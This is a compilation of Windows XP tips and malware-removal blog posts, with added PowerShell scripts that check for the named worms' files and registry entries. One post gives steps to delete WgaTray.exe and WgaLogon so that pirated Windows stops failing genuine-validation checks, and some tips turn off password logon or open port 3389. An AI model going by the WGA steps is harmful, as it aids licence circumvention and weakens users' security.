You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish.

3. Lock XP

You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. Remove System Software

XP hides some system software you might want to remove, such as Windows Messenger, but you can make it show everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be the software and you can now uninstall it.

5. Interesting New Commands

For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options.

6. IP Version 6 Support

XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry.

7. Task Termination

You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. ZIP Files as Folders

XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can change things back by typing 'regsvr32 zipfldr.dll'.

9. XP Has ClearType

XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. Remote Assistance

You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your friend's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. User Task Management

You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Disable Default Notifications

Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might go insane before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. Faster Startup

You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Delete Temp Internet Files Automatically

Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. Network Activity Light

XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. Speed-Up Your Start Menu

The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. Batch Rename Files

You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Album Cover Arts

Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Handy Shortcut Keys

Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. Windows File Protection

Windows XP secretly knows that the average user has no idea what they are doing. Therefore, it doesn't let you do really stupid things like deleting the windows directory (at least not without spending several hours convincing it that you really want to do this).

If you enjoyed it, please drop a word of appreciation. Thanks

If you run Windows then you must have seen this process running in the background. This is a very common process and appears each time you try to remove it from the startup list.

ctfmon.exe is a common and useful process related to the Microsoft Office suite. It does the important work of controlling the alternative user input and the Microsoft Office XP Language Bar. It comes in handy when we try to control the computer through speech or when using the on-screen keyboard.

The process is important to the people using these features, but others can consider disabling ctfmon.exe.

Steps to disable ctfmon.exe

In Windows

• Go to Control Panel and choose Regional and Language Options.

• Click on Details under the Text Services and Input Languages section.

• Go to the Advanced tab and check the box that reads "Turn off advanced text services".

You may also need to remove some additional features like the one shown below.

Remove from startup

• Type msconfig in the Run box and just uncheck the ctfmon option from the Startup tab.

• Reboot the computer.

The process would have been disabled now.

What is csrss.exe?

If you have been wondering what process csrss.exe is and why it is running, then here are the details.

csrss.exe is the process of the Microsoft Client/Server Runtime Subsystem, hence the process name csrss.exe. The process is used for managing the majority of the graphical instructions.

Why is it necessary?

csrss.exe is necessary for the proper functioning of Windows and its termination can result in a Blue Screen of Death. In notebooks and laptops, the process csrss.exe also handles the power management schemes.

Additional info

csrss.exe is also a name registered as a trojan, and if your system has more than one occurrence of the process, then this process should be treated as suspicious.

If csrss.exe uses 100% of the CPU when you right-click an item in Windows Explorer or on the desktop, then it is certain that your user profile is corrupt.

The virus was reported by one of our readers and, surprisingly, this virus spreads under the names of songs.exe, khatarnak.exe and pictures.exe, apart from others.

Steps to remove this virus:

1. Turn off System Restore.

2. Boot in Safe Mode.

3. Go to Add/Remove Programs and remove any programs referencing "W32/SillyFDC", "Worm.IM.Sohanad" or "khatarnak.exe" (if any).

4. Run Task Manager and kill the process (if any) relating to these exes.

5. Search the hard drive for the names corresponding to khatarnak.exe, songs.exe and pictures.exe etc.

6. Type msconfig in the Run box and remove the checkmarks next to any "khatarnak.exe" or "xsafe.exe" entries on the "Startup" tab.

7. Run the Registry Editor and delete the following entries (if any):

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srskl\Security\"Security" = "[binary data]"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srskl\"Type" = "1"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srskl\"Start" = "3"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srskl\"ImagePath" = "%WinDir%\Fonts\srskl.fon"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srskl\"ErrorControl" = "0"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srskl\"DisplayName" = "srskl"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dogkiller\Security\"Security" = "[binary data]"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dogkiller\"Type" = "1"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dogkiller\"Start" = "3"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dogkiller\"ImagePath" = "%Temp%\~dwphx.tmp"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dogkiller\"ErrorControl" = "0"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dogkiller\"DisplayName" = "dogkiller"

8. Reboot.

The virus should have gone.

This was the error message faced by one of our readers: when he boots the PC up, the csrcs.exe error message comes up on the screen.

csrsc.exe is a process which is registered as the W32.Spybot.CF virus. Do not confuse it with csrss.exe, which is an important file used by Windows. The attackers behind this virus can access our computer and gain access to some important data remotely.

Steps to remove this virus:

1. Scan the system with a good and updated antivirus.

2. Open Task Manager, locate this exe (csrcs.exe or csrsc.exe, but not csrss.exe), and kill the process.

3. Now type msconfig in the Run box, and then go to the Startup tab.

4. Locate this exe file, if any, and then remove it from there as well.

5. Now search for the file in the C: drive.

6. Permanently delete the file (csrcs.exe or csrsc.exe only) from the computer.

7. Reboot the PC for the changes to take place.

Update

After doing the above steps, you need to clean the registry as well.

1. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\

2. On the right side there is a value named "Shell"; it may have the data "Explorer.exe csrcs.exe". Just modify it to delete csrcs.exe from it (not Explorer.exe). Restart the computer.

The virus should have gone.
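The checks the two posts above describe (csrss.exe is legitimate only when it is the System32 binary, more than one copy deserves a closer look, and csrcs.exe / csrsc.exe are impostor names) can be done in one pass instead of eyeballing Task Manager. The script below is an added PowerShell example and is not code from the original posts; it assumes a Windows machine with WMI and PowerShell 2.0 or later, and should be run from an elevated prompt because WMI hides the image path of system processes from non-administrators.

```powershell
# Added example, not code from the original posts: triage csrss.exe and its lookalikes.
# Assumes Windows with WMI (PowerShell 2.0 is enough). Run it elevated: without admin
# rights WMI returns an empty ExecutablePath for system processes.

$system32  = Join-Path $env:SystemRoot 'System32'
$lookalike = @('csrcs.exe', 'csrsc.exe')      # names the posts above identify as malware

$procs = @(Get-WmiObject -Class Win32_Process)
$byPid = @{}
foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }

$findings = @()
$genuine  = 0

foreach ($p in $procs) {
    $name = $p.Name.ToLower()

    if ($lookalike -contains $name) {
        $findings += "PID $($p.ProcessId): lookalike name '$($p.Name)' running from '$($p.ExecutablePath)'"
        continue
    }
    if ($name -ne 'csrss.exe') { continue }

    $genuine++
    $parent     = $byPid[[int]$p.ParentProcessId]
    $parentName = if ($parent) { $parent.Name } else { '<exited>' }

    if ([string]::IsNullOrEmpty($p.ExecutablePath)) {
        # Path hidden: either not elevated or the process is protected; re-run elevated before judging.
        $findings += "PID $($p.ProcessId): csrss.exe path unreadable (parent $parentName); re-run elevated"
    } elseif ((Split-Path $p.ExecutablePath -Parent).TrimEnd('\') -ine $system32) {
        # The genuine binary lives only in %SystemRoot%\System32.
        $findings += "PID $($p.ProcessId): csrss.exe outside System32: '$($p.ExecutablePath)' (parent $parentName)"
    }
}

if ($genuine -gt 1) {
    # One csrss.exe per logon session is normal (Fast User Switching, Remote Desktop),
    # so treat extra copies as a reason to check each path and parent, not as proof.
    $findings += "$genuine csrss.exe instances running; verify each one's path and parent process"
}

if ($findings.Count -eq 0) { 'No csrss.exe anomalies found.' } else { $findings }
```

The script only reports; whatever it flags is still confirmed by hand (path, parent, file properties) before anything is killed or deleted, exactly as the removal steps above do.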

My PC was working all fine until I figured out that Group Policy (gpedit.msc) was not opening on my system. I wanted to open the Group Policy Editor for some work and I was shocked to find that not only gpedit.msc, but even the other commands with .msc extensions were not working, like services.msc, devmgmt.msc, compmgmt.msc etc.

Then I tried opening the editor by double clicking gpedit.msc inside the System32 folder and I got the same error, "Access is denied". What was strange was that I was accessing the editor from my administrator account.

I tried the following things:

• The first suspect is, of course, a virus, thus I scanned my whole system with the updated antivirus but it didn't find any.

• Then I scanned it with Windows Defender but it also didn't find any malicious software.

• I rebooted the system and entered Safe Mode but the commands were not working in that either.

Solution:

Then I finally decided to run System Restore and restored the system to some safe state I created when the PC was working all fine (good practice to create a checkpoint when the system is fine, isn't it). I was relieved when this solved my problem.

Note: Try to restore the system to a restore point created long ago.

Update 1

Since the problems vary for different users, installing Microsoft Management Console 3.0 for Windows XP again (as suggested by one of our viewers) may also work for you.

Download MMC

Update 2 (best solution working):

After all the efforts to find out the solution, we have been able to find the solution to this problem (thanks to our alert reader Dickens). I am describing the solution given by him and it is working all fine (I have tested it myself on my PC).

• Open Registry Editor (regedit.exe).

• Now traverse to HKEY_CLASSES_ROOT\.msc and delete the registry entry on the right side.

• After deleting it, when you again type gpedit.msc in the Run box, it will open an "Open With" dialog.

• Now select the second option and browse to get a new option; browse to C:\WINDOWS\system32\mmc.exe

• A new option "Microsoft Management Console" will appear in the window.

• Select this option and remember to check the box below to always run the command without doing this again and again.

• That's it, all .msc extensions will now open.

Microsoft has started bugging the users of non-genuine copies of Windows. If you are also running a non-genuine or pirated copy of Windows then there is a full chance of you getting this notification one day or the other.

The problem was reported by one of our viewers: when she updated her copy of Windows with Windows Update, her system started showing this notification that reads "You may be a victim of software counterfeiting" and "This copy of Windows does not pass genuine Windows validation".

These notifications start coming back again after some time and do not feel good. Though I never encourage piracy, here is how you can remove this problem:

1. Before doing anything serious, try restoring your system. If the problem is occurring after the Windows update then System Restore will surely help.

2. But if it does not, then do try this: launch Windows Task Manager.

3. Locate the process "WgaTray.exe" and end it.

4. Log in into Safe Mode and delete the file WgaTray.exe from C:\WINDOWS\system32

5. Also delete WgaTray.exe from C:\WINDOWS\system32\dllcache

6. Type regedit in Run to open Registry Editor, navigate to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify key.

7. Delete the folder WgaLogon and all of its contents.

8. Restart the PC normally.

The Happy Birthday virus is picking up a great deal of popularity and is spreading a lot faster as compared to other viruses. This virus mostly spreads through e-mails and flash drives like pen drives.

Following are the problems that this virus causes:

1. Disables Registry Editor, Folder Options and Command Prompt.

2. Shows a tool tip near the mouse cursor with the text 'Happy Birthday'.

3. Runs a process named either "explorce.exe" or "explorcr.exe" among the background processes, which is easily confused with explorer.exe.

4. The operating system shows the "NTLDR is missing" problem.

Solution to fix the problem:

1. First of all we need to get our Folder Options and Registry Editor back (to do this, refer to this post of mine).

2. Now kill the process "explorcr.exe" or "explorce.exe" running in the background.

3. Now go to Folder Options -> tick Show hidden files and folders and uncheck Hide protected operating system files.

4. Delete the exe from the "C:\WINDOWS\system32" folder.

5. Also delete the "autorun.inf" file from the root drive.

6. Now to fix the NTLDR missing problem, insert the XP CD and copy 'ntldr' from I386\NTLDR to %SystemDrive%

7. Reboot the system.

The problem must have gone.

Recently my computer was infected with this virus called sysdate.exe that was inside the RECYCLER folder in the C: drive. I knew that it was a virus since my PC didn't have the RECYCLER folder earlier. Thus the location of the virus was C:\RECYCLER\S-1-5-21-8324555943-4443154761-431384085-6428\sysdate.exe

Symptoms of this virus:

• In the RECYCLER folder there was another folder, but with the looks of the Recycle Bin, whose name was something like S-1-5-21-8324555943-4443154761-431384085-6428, and on double clicking it I came across all the files which were there in the Recycle Bin.

• There was an entry in the Registry Editor named Taskman that came back again and again on deleting.

• There were no changes in the startup and Task Manager in my system, but if there are any in yours then remove the process from startup and kill it from Task Manager.

Note: Go to Folder Options -> View tab -> check the option Show hidden files and folders and uncheck the option Hide protected operating system files.

Here are the steps how I removed the virus and fixed my problem.

1. First of all, to see all the contents in the RECYCLER folder we need to change the attributes of the folder.

2. Open Command Prompt (by typing cmd in the Run box) and type

attrib C:\RECYCLER -r -h -s and press Enter.

Then again type

attrib C:\RECYCLER\S-1-5-21-8324555943-4443154761-431384085-6428 -r -h -s and press Enter.

3. The shape and look of the folder will change from that of the Recycle Bin to a normal folder, which will now show all the contents inside it.

4. There were two files inside the S-1-5-21-8324555943-4443154761-431384085-6428 folder, sysdate.exe and autorun.inf, both of which were undeletable.

5. Now to delete the RECYCLER, S-1-5-21-8324555943-4443154761-431384085-6428, autorun.inf and sysdate.exe files, first kill the explorer.exe process from the Task Manager.

6. Your Explorer will shut down but Task Manager would still be running. Now go to File -> New Task. Click on Browse.

7. Go to the RECYCLER folder in this Browse function and Shift+Delete the sysdate.exe and autorun.inf files there; they will get easily deleted and will come back.

8. Then delete the RECYCLER folder as well.

9. After you are done with removing the viruses, type explorer.exe in the New Task section, which will bring Explorer running again.

10. Type regedit in the Run box to open Registry Editor, navigate to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon and delete the Taskman key in the right pane.

Refresh to see if it comes again. If it does not come again, your virus will have been removed.

11. If your computer has more than one user then navigate to HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon and edit the Shell key on the right side. Edit it to remove the C:\RECYCLER\S-1-5-21-8324555943-4443154761-431384085-6428 value.

The value should be only explorer.exe

Restart the computer to see the virus removed.

I did all the above steps on more than one PC and it worked on each of them.
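Several of the removal posts on this page (Happy Birthday, sysdate.exe, driveguard.exe, regsvr.exe) come down to the same two artefacts: an autorun.inf at a drive root and a hidden, system-attributed folder under RECYCLER that Explorer draws as a Recycle Bin. The script below is an added PowerShell example and is not code from the original posts; it walks every ready drive, shows the attributes the way attrib.exe does, prints the autorun.inf so its open= or shellexecute= line can be read, and deletes nothing. It assumes PowerShell 2.0 or later.

```powershell
# Added example, not code from the original posts: inspect every ready drive for the
# root autorun.inf files and the hidden RECYCLER\S-1-5-... folders that the steps above
# remove with attrib and Shift+Delete. Read-only: it reports attributes and contents and
# deletes nothing. Assumes PowerShell 2.0 or later.

function Get-AttribText([System.IO.FileSystemInfo]$item) {
    # Render the R/H/S bits the way attrib.exe shows them.
    $a = $item.Attributes
    $t = ''
    if (($a -band [System.IO.FileAttributes]::ReadOnly) -ne 0) { $t += 'R' }
    if (($a -band [System.IO.FileAttributes]::Hidden)   -ne 0) { $t += 'H' }
    if (($a -band [System.IO.FileAttributes]::System)   -ne 0) { $t += 'S' }
    if ($t -eq '') { $t = '-' }
    return $t
}

foreach ($drive in [System.IO.DriveInfo]::GetDrives()) {
    if (-not $drive.IsReady) { continue }
    $root = $drive.RootDirectory.FullName      # e.g. C:\

    # 1. autorun.inf at the drive root: print it so the open= / shellexecute= target can be read.
    $inf = Join-Path $root 'autorun.inf'
    if (Test-Path -LiteralPath $inf) {
        $fi = New-Object System.IO.FileInfo $inf
        Write-Output ("{0}autorun.inf  attrib={1}" -f $root, (Get-AttribText $fi))
        Get-Content -LiteralPath $inf | ForEach-Object { Write-Output ('    ' + $_) }
    }

    # 2. RECYCLER itself is a normal folder on NTFS volumes; what the sysdate.exe post found
    #    suspicious was a SID-named subfolder that carried its own autorun.inf and an .exe.
    $recycler = Join-Path $root 'RECYCLER'
    if (-not (Test-Path -LiteralPath $recycler)) { continue }
    foreach ($sub in @(Get-ChildItem -LiteralPath $recycler -Force | Where-Object { $_.PSIsContainer })) {
        $nested = Join-Path $sub.FullName 'autorun.inf'
        $exes   = @(Get-ChildItem -LiteralPath $sub.FullName -Force -Filter '*.exe' -ErrorAction SilentlyContinue)
        if ((Test-Path -LiteralPath $nested) -or $exes.Count -gt 0) {
            $names = ($exes | ForEach-Object { $_.Name }) -join ', '
            Write-Output ("{0}  attrib={1}  autorun.inf={2}  exe files: {3}" -f $sub.FullName, (Get-AttribText $sub), (Test-Path -LiteralPath $nested), $names)
        }
    }
}
```

Reading the autorun.inf before touching anything tells you which executable the drive would have launched; that name is then what to look for in Task Manager, msconfig and the Run keys in the following steps.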

One of our readers wanted to know the method to remove the driveguard.exe virus, which is also known by the names flashguard.exe and drivemonitor.exe. So here goes the solution, which is a bit different from the other virus removal methods.

What does driveguard.exe do?

• Adds itself to startup and the Task Manager.

• Adds a registry key for making changes in the Registry Editor.

• Adds an autorun.inf file to the pen drive.

• Adds some malicious temporary files to the system.

Solution:

1. Boot the computer in Safe Mode.

2. Open the Task Manager and kill the processes with the names driveguard.exe/flashguard.exe/drivemonitor.exe

3. Open My Computer and search for the same virus names, but don't forget to check all the boxes in the 'More advanced options' of Search. Delete all the files.

4. Now search for .tmp.exe and delete the driveguard.tmp.exe and ghmpg.tmp.exe files, if any.

5. Open msconfig, now go to the startup processes and uncheck the FlashGuard process to remove it from the startup list.

6. Open regedit and navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FlashGuard.

7. Click on FlashGuard and delete the key.

The virus would have been removed.

There are so many types of computer viruses in this world that removing them and finding a specific solution for each of them is a big ask. One such virus that screwed me is regsvr.exe, classified as a W32.Imaut worm.

It has become a daily routine that when I plug my pen drive into my college systems (full of all kinds of viruses), it gets infected by the viruses instantly. Though the antivirus I use (Symantec) successfully detects and removes them, I feel that I should discuss the steps to remove the regsvr.exe virus.

What does the regsvr.exe virus do?

• This worm creates folders and a registry entry to enable its automatic execution at every system startup.

• This worm also creates a scheduled task to enable its automatic execution at a specified date and/or time.

• It also creates an autorun.inf file for its auto execution.

Solution to fix the problem:

1. If the Task Manager and Registry Editor are disabled then we need to enable them first. Read this post.

2. Delete the autorun.inf file created by the virus. Read this post to know how to do that.

3. Now type msconfig in the Run dialog and click on the Startup tab.

4. Look for regsvr and uncheck any options, click OK.

5. Now traverse to Control Panel -> Scheduled Tasks, and delete the At1 task that might be listed there.

6. Type regedit in the Run dialog to open the Registry Editor.

7. Click on Edit -> Find and search for regsvr.exe

8. Just delete all the occurrences of the regsvr.exe virus (do not confuse it with regsvr32.exe, which is not a virus).

9. Navigate to the entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon and modify the entry Shell = "Explorer.exe regsvr.exe" to delete regsvr.exe from it.

10. Now to actually delete the virus from the system, go to the system32 folder and delete the regsvr.exe virus file from there (you will need to uncheck the option "Hide protected operating system files" in Folder Options to view the virus file).

Reboot the system for the changes to take place.
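The csrcs.exe, sysdate.exe, driveguard.exe and regsvr.exe posts above all end in the same registry places: the Winlogon Shell and Taskman values, and the Run / RunServices autostart keys (the ILOVEYOU post further down names more Run entries, and tip 13 earlier on this page sets AutoAdminLogon under the same Winlogon key). The script below is an added PowerShell example and is not code from the original posts; it reads those locations, flags the specific value and file names the posts mention, lists every other autostart entry for manual review, and changes nothing. It assumes PowerShell 2.0 or later.

```powershell
# Added example, not code from the original posts: read-only review of the Winlogon and
# Run/RunServices registry locations that the removal steps above edit by hand. It flags
# the specific names those posts mention and lists everything else for manual review.
# Assumes PowerShell 2.0 or later; reading these keys needs no elevation.

$winlogonKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
    'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
)
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)
# Value names and file names taken from the removal posts on this page.
$badNames = @('FlashGuard', 'MSKernel32', 'Win32DLL', 'WIN-BUGSFIX', 'WinFAT32')
$badFiles = @('csrcs.exe', 'csrsc.exe', 'regsvr.exe', 'sysdate.exe', 'driveguard.exe',
              'flashguard.exe', 'drivemonitor.exe', 'khatarnak.exe', 'xsafe.exe',
              'explorce.exe', 'explorcr.exe')

$findings = @()

foreach ($key in $winlogonKeys) {
    if (-not (Test-Path $key)) { continue }
    $v = Get-ItemProperty -Path $key

    # Shell must be exactly explorer.exe; the worms above append "csrcs.exe",
    # "regsvr.exe" or a C:\RECYCLER path to it.
    if ($null -ne $v.Shell -and $v.Shell.Trim() -ine 'explorer.exe') {
        $findings += "$key : Shell = '$($v.Shell)' (expected 'explorer.exe')"
    }
    # Taskman is normally absent; the sysdate.exe post saw it re-created after every deletion.
    if ($null -ne $v.Taskman) {
        $findings += "$key : Taskman = '$($v.Taskman)' (normally not present)"
    }
    # Tip 13 above ("control userpasswords2") sets this; it means no password prompt at boot.
    if ($v.AutoAdminLogon -eq '1') {
        $findings += "$key : AutoAdminLogon = 1 (automatic logon as '$($v.DefaultUserName)')"
    }
}

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $v = Get-ItemProperty -Path $key
    foreach ($prop in $v.PSObject.Properties) {
        # Get-ItemProperty adds PSPath, PSParentPath, PSChildName, PSDrive, PSProvider; skip them.
        if ($prop.Name -like 'PS*') { continue }
        $data = [string]$prop.Value
        $hit  = ($badNames -contains $prop.Name) -or
                (@($badFiles | Where-Object { $data -imatch [regex]::Escape($_) }).Count -gt 0)
        $tag  = if ($hit) { 'KNOWN BAD' } else { 'review' }
        $findings += "$key : $tag  $($prop.Name) = '$data'"
    }
}

if ($findings.Count -eq 0) { 'Nothing found in Winlogon or Run keys.' } else { $findings }
```

Entries marked "review" are not verdicts; compare each one's path against what is actually installed, and only then remove it with Registry Editor as the steps above describe.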

Gosh! There are so many viruses, and of different names, that the virus creators seem to run short of names. "I Love You virus" is a strange name used by its creator. Requested by one of our viewers, here are the steps to remove the virus.

But before discussing the solution, let's see the details of this virus. The "I Love You" virus is also known as the "Love" virus and spreads mainly via emails. The name is believed to originate from the subject of the mails, but there have been some other modifications in the name like the "Mother's Day" and "Joke" virus.

This is the format of the e-mail that contains this virus.

Sender: someone the user knows

Subject: ILOVEYOU

Body: kindly check the attached LOVELETTER coming from me.

Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs

The default settings of Windows don't display the last extension, and this is where a user takes this virus for a normal text document.
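The hidden-extension trick above is worth checking for in two places: the Explorer setting that hides extensions at all, and the files themselves. The script below is an added PowerShell example and is not code from the original post; it reports whether HideFileExt is on and lists files whose real extension sits behind a document-looking one. It generalises the .TXT.vbs case to other document/executable pairs; both extension lists are constructed here, and the Desktop folder it scans is an assumed example location. It assumes PowerShell 2.0 or later.

```powershell
# Added example, not code from the original post: show whether Explorer hides file
# extensions (the setting that turns LOVE-LETTER-FOR-YOU.TXT.vbs into "LOVE-LETTER-FOR-YOU.TXT"
# on screen) and list files whose real extension hides behind a document-looking one.
# Both extension lists are constructed for this example; the scanned folder is assumed.

function Test-ExtensionsHidden {
    # HideFileExt = 1 (the Windows default) hides the extension of registered file types.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
    $v = (Get-ItemProperty -Path $key -Name HideFileExt -ErrorAction SilentlyContinue).HideFileExt
    return ($null -eq $v -or $v -eq 1)
}

function Get-DoubleExtensionFiles([string]$folder) {
    $innocent   = @('txt', 'jpg', 'jpeg', 'gif', 'doc', 'pdf', 'htm', 'html')                 # what the user thinks it is
    $executable = @('vbs', 'vbe', 'js', 'jse', 'wsf', 'exe', 'scr', 'pif', 'bat', 'cmd', 'com') # what actually runs
    $pattern = '\.(' + ($innocent -join '|') + ')\.(' + ($executable -join '|') + ')$'
    Get-ChildItem -LiteralPath $folder -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { -not $_.PSIsContainer -and $_.Name -imatch $pattern } |
        ForEach-Object { $_.FullName }
}

if (Test-ExtensionsHidden) {
    Write-Output 'Explorer is hiding known extensions. To show them: Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name HideFileExt -Value 0 (then restart Explorer).'
}

# Scan the current user's Desktop (assumed location for saved attachments; change as needed).
Get-DoubleExtensionFiles (Join-Path $env:USERPROFILE 'Desktop')
```

Showing extensions is the cheap fix for the whole class: once HideFileExt is 0, the attachment in the mail above appears as LOVE-LETTER-FOR-YOU.TXT.vbs, and the .vbs is visible before anyone double-clicks it.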



Steps to remove the Love virus:

1. Kill any process containing "love" from the Task Manager; also remove it from the computer's startup list (run msconfig from the Run box).

2. Search your hard disk for the following entries:

LOVE-LETTER-FOR-YOU.TXT.vbs
LOVE-LETTER-FOR-YOU.HTM
MSKernel32.vbs
Win32DLL.vbs
WIN-BUGSFIX.exe

Permanently delete the files found in the above search results.

3. Run regedit from the Run box and delete the following entries, if any:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinFAT32 = WinFAT32.exe

This will restore the settings back to the original after rebooting the computer.

4. You may also like to change the default URL in the registry to:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page = "http://www.msn.com" or any of your choice.